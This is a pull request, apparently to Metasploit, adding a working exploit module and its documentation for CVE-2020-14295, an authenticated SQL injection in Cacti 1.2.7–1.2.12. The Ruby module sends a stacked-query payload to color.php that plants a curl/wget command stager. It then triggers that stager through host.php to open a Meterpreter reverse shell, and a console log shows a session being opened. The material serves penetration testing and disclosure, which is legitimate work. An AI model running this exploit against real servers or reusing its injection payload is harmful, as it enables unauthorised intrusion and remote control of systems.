### PR TITLE
Cacti 1.2.7 - 1.2.12  -  Authenticated RCE

### DIFF
--- a/documentation/modules/exploit/linux/http/cacti_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/cacti_authenticated_rce.md
@@ -1,0 +1,60 @@
+## Vulnerable Application
+
+### Description
+
+This module allows an attacker with a privileged Cacti account to start a reverse shell using an sql injection
+in the `filter` parameter of `color.php`. This then allows to set the `path_php_binary` field in `user_auth`
+sql table of Cacti with a malicious payload. Finally that payload is triggered by a call to `host.php`
+
+### Installation
+
+Vulnerable versions of Cacti can be downloaded from [here](https://www.cacti.net/downloads/).
+As it requires some work to configure it, you can use this [docker file](https://hub.docker.com/r/waperez/cacti)
+(as long as it is not updated and remains a 1.2.11 version of Cacti)
+
+## Verification Steps
+
+List the steps needed to make sure this thing works
+
+1. Start `msfconsole`
+2. `use exploit/linux/http/cacti_authenticated_rce`
+3. `set USERNAME <admin_username>`
+4. `set PASSWORD <admin_password>`
+5. `set TARGETURI <base_path_cacti>` if the base path of Cacti web server is different from `/`
+6. `check` to check if the targeted Cacti server is vulnerable
+7. `run` the module to exploit the vulnerability and start a reverse shell
+
+## Options
+
+### USERNAME
+
+Set the USERNAME of your admin account.
+
+### PASSWORD
+
+Set the PASSWORD of your admin account.
+
+## Scenarios
+
+This module was successfully tested on Debian 10 with Cacti 1.2.11. See the following output :
+
+```
+msf6 exploit(cacti_rce) > run
+
+[*] Started reverse TCP handler on X.X.X.X:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] Version 1.2.11 of Cacti found !
+[+] The target is vulnerable.
+[+] We successfully logged in !
+[*] Using URL: http://0.0.0.0:8081/OOuyTjGJsbK
+[*] Local IP: http://X.X.X.X:8081/OOuyTjGJsbK
+[*] Client Y.Y.Y.Y (curl/7.58.0) requested /OOuyTjGJsbK
+[*] Sending payload to Y.Y.Y.Y (curl/7.58.0)
+[*] Sending stage (3012548 bytes) to Y.Y.Y.Y
+[*] Meterpreter session 12 opened (X.X.X.X:4444 -> Y.Y.Y.Y:46828) at 2021-06-15 13:42:19 +0200
+[*] Payload triggered !
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Server stopped.
+
+meterpreter >
+```

--- a/modules/exploits/linux/http/cacti_authenticated_rce.rb
+++ b/modules/exploits/linux/http/cacti_authenticated_rce.rb
@@ -96,10 +96,8 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with Failure::Unreachable "Can't access the Cacti web interface"
     end
 
-    h = r.headers
-
     csrf_token = r.body.to_s[/csrfMagicToken='sid:([0-9a-z,]*);ip/, 1]
-    @cookie = h['Set-Cookie'].to_s[/Cacti=([0-9a-z]*);/, 1]
+    @cookie = r.get_cookies.to_s[/Cacti=([0-9a-z]*);/, 1]
 
     if !csrf_token || !@cookie
       fail_with Failure::UnexpectedReply "Can't find CSRF token or cookie in HTTP reply"

--- a/modules/exploits/linux/http/cacti_authenticated_rce.rb
+++ b/modules/exploits/linux/http/cacti_authenticated_rce.rb
@@ -1,0 +1,167 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cacti 1.2.7 - 1.2.12  -  Authenticated RCE',
+        'Description' => %q{
+          This module allows an attacker with a privileged Cacti account to start a reverse shell using an sql injection
+          in the `filter` parameter of `color.php`. This then allows to set the `path_php_binary` field in `user_auth`
+          sql table of Cacti with a malicious payload. Finally that payload is triggered by a call to `host.php`
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Cyril Servieres (cyril.servieres[at]orange.com', # POC on https://github.com/Cacti/cacti/issues/3622
+            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+          ],
+        'References' =>
+          [
+            ['CVE', '2020-14295']
+          ],
+        'Targets' =>
+          [
+            [
+              'Linux (dropper)', {
+                'Platform' => 'linux',
+                'Type' => :linux_dropper,
+                'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'curl' },
+                'CmdStagerFlavor' => %w[curl wget],
+                'Arch' => [ARCH_X86, ARCH_X64]
+              }
+            ]
+          ],
+        'Privileged' => true,
+        'DisclosureDate' => '2020-06-17',
+        'DefaultTarget' => 0,
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          }
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username of the admin account', nil]),
+      OptString.new('PASSWORD', [true, 'Password of the admin account', nil]),
+      OptString.new('TARGETURI', [true, 'The base path of the Cacti server', '/'])
+    ]
+  end
+
+  def execute_command(cmd, _opts = {})
+    cmd = cmd.gsub('+', '%2b').gsub(' ', '+')
+
+    send_request_cgi({
+      'method' => 'GET',
+      'headers' => {
+        'Cookie' => 'Cacti=' + @cookie + '; cross-site-cookie=bar'
+      },
+      'uri' => normalize_uri(target_uri.path, "/cacti/color.php?action=export&header=false&filter=1%27)+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value=%27#{cmd};%27+where+name=%27path_php_binary%27;--+-")
+    })
+
+    send_request_cgi({
+      'method' => 'GET',
+      'headers' => {
+        'Cookie' => 'Cacti=' + @cookie + '; cross-site-cookie=bar'
+      },
+      'uri' => normalize_uri(target_uri.path, '/cacti/host.php'),
+      'vars_get' => {
+        'action' => 'reindex'
+      }
+    })
+
+    print_status('Payload triggered !')
+  end
+
+  def authenticate
+    r = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/cacti/index.php')
+    })
+
+    if r.nil? || r.code != 200
+      fail_with Failure::Unreachable "Can't access the Cacti web interface"
+    end
+
+    h = r.headers
+
+    csrf_token = r.body.to_s[/csrfMagicToken='sid:([0-9a-z,]*);ip/, 1]
+    @cookie = h['Set-Cookie'].to_s[/Cacti=([0-9a-z]*);/, 1]
+
+    if !csrf_token || !@cookie
+      fail_with Failure::UnexpectedReply "Can't find CSRF token or cookie in HTTP reply"
+    end
+
+    r = send_request_cgi({
+      'method' => 'POST',
+      'headers' => {
+        'Upgrade-Insecure-Requests' => 1,
+        'Origin' => 'http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s,
+        'Cookie' => 'Cacti=' + @cookie + '; cross-site-cookie=bar',
+        'Referer' => 'http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/cacti/index.php'
+      },
+      'uri' => normalize_uri(target_uri.path, '/cacti/index.php'),
+      'vars_post' => {
+        '__csrf_magic' => 'sid:' + csrf_token,
+        'action' => 'login',
+        'login_username' => datastore['USERNAME'],
+        'login_password' => datastore['PASSWORD']
+      }
+    })
+
+    if r.nil? || (r.code != 200 && r.code != 302)
+      fail_with Failure::Unreachable "Can't access the cacti web interface"
+    end
+
+    if r.code == 302
+      print_good 'We successfully logged in !'
+    elsif r.code == 200 && r.body.to_s[/Invalid/, 1]
+      fail_with Failure::BadConfig 'The admin credentials given are incorrect'
+    end
+  end
+
+  def check
+    r = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/cacti/index.php')
+    })
+
+    if r&.code == 200
+
+      version = r.body.to_s.match(/Version ([\d*]).(\d*).(\d*)/)
+
+      if version
+
+        print_good(version[0] + ' of Cacti found !')
+
+        if version[1].to_i != 1 || version[2].to_i != 2 || version[3].to_i < 7 || version[3].to_i > 12
+          CheckCode::Safe('Only versions from 1.2.7 to 1.2.12 are vulnerable !')
+        else
+          CheckCode::Vulnerable
+        end
+      else
+        CheckCode::Unknown('Version of Cacti not found !')
+      end
+    else
+      CheckCode::Unknown("Can't access the Cacti web interface !")
+    end
+  end
+
+  def exploit
+    authenticate
+    execute_cmdstager
+  end
+end


### PR DESCRIPTION
## Description

This module allows an attacker with a privileged Cacti account to start a reverse shell using an sql injection
in the `filter` parameter of `color.php`. This then allows to set the `path_php_binary` field in `user_auth`
sql table of Cacti with a malicious payload. Finally that payload is triggered by a call to `host.php`

## Installation

Vulnerable versions of Cacti can be downloaded from [here](https://www.cacti.net/downloads/).
As it requires some work to configure it, you can use this [docker file](https://hub.docker.com/r/waperez/cacti)
(as long as it is not updated and remains a 1.2.11 version of Cacti)

## Verification Steps

List the steps needed to make sure this thing works

1. Start `msfconsole`
2. `use exploit/linux/http/cacti_authenticated_rce`
3. `set USERNAME <admin_username>`
4. `set PASSWORD <admin_password>`
5. `set TARGETURI <base_path_cacti>` if the base path of Cacti web server is different from `/`
6. `check` to check if the targeted Cacti server is vulnerable
7. `run` the module to exploit the vulnerability and start a reverse shell

## Scenarios

This module was successfully tested on Debian 10 with Cacti 1.2.11. See the following output :


![image](https://user-images.githubusercontent.com/84333864/122053818-61fc5b80-cde7-11eb-9e35-dbee0ca27585.png)
